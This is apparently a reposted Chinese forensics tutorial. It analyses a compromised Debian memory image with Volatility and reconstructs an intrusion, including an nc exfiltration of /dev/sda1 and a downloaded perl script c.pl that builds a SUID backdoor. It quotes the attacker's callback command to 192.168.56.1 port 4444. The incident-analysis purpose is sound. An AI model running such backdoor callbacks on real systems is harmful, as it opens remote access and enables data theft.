第二,我们可以利用搜索引擎或者已公开的profile,例如,我们就可以看到一些已经公布的profile。
我这里使用的是第二种方法,在公开的项目中找到了Debian5.0的profile

紧接着,我们需要将profile放入对应的位置
即放入目录volatility/plugins/overlays/linux中。

然后,我们可以通过pythonvol.py--info来查看是否真的加载profile了。linux网络命令

我们可以看到profiles中已经能看到LinuxDebian5010x86了,这是我们压缩包的名字。
第三步开始分析文件
pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86-h
可以看到针对linux镜像的命令,以及相应功能介绍。

通过

pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_psaux
我们可以查看进程。

我们可以发现一个可疑的nc连接。连接到192.168.56.1端口是8888
pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_netstat
我们可以查看各种网络相关信息,如网络连接,路由表,接口状态等。

我们可以看到与292.168.56.1相关的网络连接情况,一个是4444端口,一个是8888端口,
pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_bash
我们可以查看bash的历史记录

我们看到,通过scp命令复制了exim4目录下的所有文件,另外,我们在/mnt/var/log/exim4目录下的Eximrejectlog中看到,
两条命令,似乎从192.168.56.1下载了东西。
攻击者已经下载了两个文件c.pl和rk.tar,都在/tmp中。
c.pl的简单分析表明,它是一个perl脚本,用于创建一个c程序,该程序编译给支持SUID的可执行文件
打开一个后门并向攻击者发送信息。
c.pl被下载,并且编译的SUID在端口4444中打开了一个到192.168.56.1的连接,如下所示:
wget;perl/tmp/c.pl192.168.56.14444
以及,在pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_bash,我们还看到了攻击者一个奇怪的操作。
攻击者将/dev/sda1整个dump下来,并通过8888端口发送了出去。
Eximreject日志显示IP192.168.56.101作为要发送邮件的主机:
abcde.com,owned.org和h0n3yn3t-pr0j3ct.com

攻击者可能只是一个脚本小子,利用已有的cve 公布了的exp 进入到了系统并没有成功登录账户其次通过分析,我们可以知道攻击的发起以及结束并且我们了解到攻击者简单尝试了登录账户32次后就放弃了。返回搜狐,查看更多
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-76938-2.html
是不是山寨出来的
咱们啥时候也能这么霸气一回
还是三千亿